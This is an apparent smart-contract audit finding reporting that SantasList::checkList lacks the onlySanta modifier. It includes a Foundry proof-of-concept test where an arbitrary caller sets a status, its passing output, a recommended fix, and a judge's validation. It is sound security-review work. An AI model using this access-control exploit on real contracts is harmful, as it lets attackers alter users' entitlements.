Submission Details
Severity: high
Valid

Missing Validation on `SantasList::checkList` allows random address to set status

Summary

Missing Validation on SantasList::checkList allows random address to set status

Vulnerability Details

SantasList::checkList is missing the onlySanta modifier, so any caller can set the status of an arbitrary address. In particular, a person who already holds the NICE or EXTRA_NICE status can be downgraded to NAUGHTY, removing their right to collect and buy presents.

PoC

function testRandomAddressCheckOne() public {
    // any user, not only Santa, can call checkList
    vm.expectEmit(false, false, false, true);
    emit CheckedOnce(user, SantasList.Status.EXTRA_NICE);
    vm.prank(user);
    santasList.checkList(user, SantasList.Status.EXTRA_NICE);
    // the status set by the non-Santa caller is persisted
    assertTrue(santasList.getNaughtyOrNiceOnce(user) == SantasList.Status.EXTRA_NICE);
}

Output:

forge test --mt testRandomAddressCheckOne
[⠒] Compiling...
No files changed, compilation skipped
Running 1 test for test/unit/SantasListTest.t.sol:SantasListTest
[PASS] testRandomAddressCheckOne() (gas: 37854)
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.32ms

Impact

HIGH. Breaks protocol goals.

Tools Used

  • Manual Review

Recommendations

Add onlySanta modifier to SantasList::checkList.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.
